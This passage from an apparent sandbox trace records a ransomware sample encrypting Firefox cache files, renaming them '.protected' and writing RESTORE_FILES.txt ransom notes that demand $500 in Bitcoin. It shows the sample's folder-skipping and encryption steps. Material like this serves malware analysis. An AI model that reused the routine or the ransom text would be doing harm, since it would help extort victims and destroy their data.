halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.054] StrStrW (lpFirst="B60F3d01", lpSrch=".txt") returned 0x0 [0086.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.054] StrStrW (lpFirst="B60F3d01", lpSrch=".rar") returned 0x0 [0086.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.054] StrStrW (lpFirst="B60F3d01", lpSrch=".zip") returned 0x0 [0086.054] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.065] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.065] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.066] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.066] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.066] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.066] CloseHandle (hObject=0x160) returned 1 [0086.066] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.protected") returned 119 [0086.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.protected")) returned 1 [0086.067] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.067] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.067] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\RESTORE_FILES.txt") returned 118 [0086.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.068] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.068] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.068] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.068] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.068] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.068] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.069] CloseHandle (hObject=0x15c) returned 1 [0086.069] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="Windows") returned -1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="Program Files") returned -1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="Program Files (x86)") returned -1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="$Recycle.bin") returned 1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="System Volume Information") returned -1 [0086.069] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned 100 [0086.069] lstrcmpW (lpString1="A8", lpString2=".") returned 1 [0086.069] lstrcmpW (lpString1="A8", lpString2="..") returned 1 [0086.069] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\*") returned 102 [0086.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.069] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.069] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.070] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\.") returned 102 [0086.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.070] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.070] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\..") returned 103 [0086.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.070] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="Windows") returned -1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="Program Files") returned -1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="Program Files (x86)") returned -1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="$Recycle.bin") returned 1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="System Volume Information") returned -1 [0086.070] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.070] StrStrIW (lpFirst="C3B7Bd01", lpSrch=".protected") returned 0x0 [0086.070] lstrcmpW (lpString1="C3B7Bd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.071] StrStrW (lpFirst="C3B7Bd01", lpSrch=".txt") returned 0x0 [0086.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.071] StrStrW (lpFirst="C3B7Bd01", lpSrch=".rar") returned 0x0 [0086.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.071] StrStrW (lpFirst="C3B7Bd01", lpSrch=".zip") returned 0x0 [0086.071] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.082] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.082] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.082] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.082] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.082] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.082] CloseHandle (hObject=0x160) returned 1 [0086.083] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.protected") returned 119 [0086.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.protected")) returned 1 [0086.083] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.083] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.084] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\RESTORE_FILES.txt") returned 118 [0086.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.084] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.084] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.085] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.085] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.085] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.085] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.085] CloseHandle (hObject=0x15c) returned 1 [0086.085] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.085] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.085] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\RESTORE_FILES.txt") returned 115 [0086.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.086] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.087] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.087] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.087] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.087] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.087] CloseHandle (hObject=0x158) returned 1 [0086.088] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.088] lstrcmpiW (lpString1="1", lpString2="Windows") returned -1 [0086.088] lstrcmpiW (lpString1="1", lpString2="Program Files") returned -1 [0086.088] lstrcmpiW (lpString1="1", lpString2="Program Files (x86)") returned -1 [0086.088] lstrcmpiW (lpString1="1", lpString2="$Recycle.bin") returned 1 [0086.088] lstrcmpiW (lpString1="1", lpString2="System Volume Information") returned -1 [0086.088] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned 97 [0086.088] lstrcmpW (lpString1="1", lpString2=".") returned 1 [0086.088] lstrcmpW (lpString1="1", lpString2="..") returned 1 [0086.088] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\*") returned 99 [0086.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.089] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.089] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.089] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.089] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.089] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\.") returned 99 [0086.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.089] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.089] lstrcmpiW (lpString1="..", 